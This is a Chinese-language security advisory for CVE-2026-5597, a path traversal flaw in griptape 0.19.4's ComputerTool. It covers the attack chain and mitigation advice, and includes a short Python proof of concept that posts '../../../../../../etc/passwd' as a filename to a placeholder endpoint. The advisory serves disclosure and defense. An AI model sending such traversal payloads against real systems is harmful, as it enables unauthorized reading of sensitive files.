IPBUF安全漏洞报告
English
CVE-2026-5597 CVSS 6.3 中危

CVE-2026-5597 griptape路径遍历漏洞

披露日期: 2026-04-05
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-5597
漏洞类型
路径遍历
CVSS评分
6.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
griptape-ai griptape

相关标签

路径遍历griptapePython信息泄露CVE-2026-5597

漏洞概述

griptape-ai griptape 0.19.4版本存在路径遍历漏洞。由于`ComputerTool`组件对`filename`参数校验不严,攻击者可远程构造恶意参数读取系统敏感文件。该漏洞攻击门槛低且利用代码已公开,存在较高安全风险。

技术细节

该漏洞源于griptape-ai griptape 0.19.4版本中`griptape/tools/computer/tool.py`文件的`ComputerTool`组件。该组件在处理文件操作时,未能对用户传入的`filename`参数进行严格的边界检查和规范化处理。攻击者可以利用这一点,通过在参数中插入“../”或绝对路径字符,绕过应用程序的目录限制。由于该漏洞允许远程攻击且无需用户交互,攻击者可以构造特定的HTTP请求,诱使服务器读取并返回系统敏感文件(如配置文件、密钥等),从而造成严重的信息泄露风险。

攻击链分析

STEP 1
侦察
攻击者识别目标系统运行griptape 0.19.4版本,并确认开放了相关的ComputerTool组件接口。
STEP 2
利用
攻击者向目标接口发送特制的数据包,在`filename`字段中注入路径遍历序列(如`../`),指向系统敏感文件。
STEP 3
执行
服务器端未进行有效过滤,将恶意路径拼接后执行文件读取操作。
STEP 4
影响
服务器响应返回敏感文件内容,攻击者获取系统信息,导致机密性泄露。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (Example) target_url = "http://target-endpoint/computer/action" # Malicious payload utilizing path traversal # Attempting to read /etc/passwd on Linux payload = { "filename": "../../../../../../etc/passwd" } try: response = requests.post(target_url, data=payload) if response.status_code == 200: print("Exploit successful!") print("Response content:") print(response.text) else: print(f"Exploit failed with status code: {response.status_code}") except Exception as e: print(f"An error occurred: {e}")

影响范围

griptape-ai griptape 0.19.4

防御指南

临时缓解措施
建议立即限制对受影响API的访问来源IP,并在应用层面对文件名参数进行严格的正则匹配校验,拒绝包含路径跳转字符的输入,直至官方发布补丁。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表